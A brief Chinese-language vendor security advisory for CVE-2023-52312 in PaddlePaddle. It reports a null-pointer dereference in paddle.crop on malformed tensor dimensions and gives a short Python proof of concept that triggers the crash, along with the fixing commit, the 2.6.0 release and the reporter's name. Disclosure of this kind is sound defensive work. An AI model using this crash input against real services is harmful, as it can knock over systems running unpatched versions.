CVE-2023-52312
输入张量的维度异常时,paddle.crop会引发空指针解引用,PoC代码如下:
import paddle
import numpy as np
x = paddle.to_tensor(np.random.uniform(0, 10, [2, 2]).astype(np.int32))
shape = paddle.to_tensor([-1, 0], dtype='int32')
offsets = paddle.to_tensor([], dtype='int32')
out = paddle.crop(x, shape, offsets)我们在commit c074de6911944d5d30d28cc7ce2c7099f1c87bce中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。
请参考我们的安全指南以获得更多关于安全的信息,以及如何与我们联系问题。
此漏洞由 Peng Zhou (zpbrent) from Shanghai University 提交。